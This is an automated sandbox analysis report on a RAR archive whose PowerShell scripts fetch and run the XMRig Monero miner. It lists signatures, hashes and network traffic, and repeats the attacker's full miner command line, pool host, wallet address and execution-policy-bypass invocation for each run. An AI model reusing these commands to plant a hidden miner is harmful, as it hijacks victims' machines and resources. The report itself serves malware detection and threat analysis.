Malware Analysis Report

2025-04-19 14:54

Sample ID 240522-yy1n5seg81
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:12

Signatures

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3108-0-0x00007FFF1DEB3000-0x00007FFF1DEB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1chwhlrd.k2u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3108-9-0x0000021836800000-0x0000021836822000-memory.dmp

memory/3108-10-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

memory/3108-11-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

memory/3108-12-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

memory/3108-14-0x0000021836890000-0x00000218368A2000-memory.dmp

memory/3108-15-0x0000021836870000-0x000002183687A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3628-46-0x000001C1AB0E0000-0x000001C1AB100000-memory.dmp

memory/3628-47-0x000001C1AB130000-0x000001C1AB150000-memory.dmp

memory/3628-48-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-52-0x000001C1AB170000-0x000001C1AB190000-memory.dmp

memory/3628-51-0x000001C1AB150000-0x000001C1AB170000-memory.dmp

memory/3108-50-0x00007FFF1DEB0000-0x00007FFF1E972000-memory.dmp

memory/3628-49-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3108-53-0x00007FFF1DEB3000-0x00007FFF1DEB5000-memory.dmp

memory/3628-54-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-55-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-56-0x000001C1AB150000-0x000001C1AB170000-memory.dmp

memory/3628-57-0x000001C1AB170000-0x000001C1AB190000-memory.dmp

memory/3628-58-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-59-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-60-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-61-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-62-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-63-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-64-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-65-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-66-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-67-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-68-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-69-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-70-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-71-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-72-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-73-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-74-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-75-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-76-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-77-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-78-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-79-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-80-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-81-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-82-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-83-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-84-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-85-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-86-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-87-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-88-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-89-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-90-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-91-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-92-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-93-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-94-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-95-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-96-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-97-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-98-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-99-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-100-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-101-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-102-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-103-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-104-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-105-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-106-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-107-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-108-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-109-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-110-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-111-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-112-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-113-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-114-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-115-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

memory/3628-116-0x00007FF65B370000-0x00007FF65BFA3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/2940-3-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp

memory/2940-5-0x000001DABC100000-0x000001DABC122000-memory.dmp

memory/2940-6-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp

memory/2940-10-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp

memory/2940-9-0x000001DABBD50000-0x000001DABBDC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlgdndge.24m.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2940-25-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp

memory/2940-48-0x000001DABBDD0000-0x000001DABBDE2000-memory.dmp

memory/2940-61-0x000001DABBD40000-0x000001DABBD4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1268-90-0x000001BC23610000-0x000001BC23630000-memory.dmp

memory/2940-91-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp

memory/1268-92-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/2940-93-0x00007FFE43C83000-0x00007FFE43C84000-memory.dmp

memory/2940-94-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp

memory/1268-95-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-96-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-97-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-98-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-99-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-100-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-101-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-102-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-103-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-104-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-105-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-106-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-107-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-108-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-109-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-110-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-111-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-112-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-113-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-114-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-115-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-116-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-117-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-118-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-119-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-120-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-121-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-122-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-123-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-124-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-125-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-126-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-127-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-128-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-129-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-130-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-131-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-132-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-133-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-134-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-135-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-136-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-137-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-138-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-139-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-140-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-141-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-142-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-143-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-144-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-145-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-146-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-147-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-148-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-149-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-150-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-151-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-152-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-153-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-154-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-155-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

memory/1268-156-0x00007FF679DF0000-0x00007FF67AA23000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
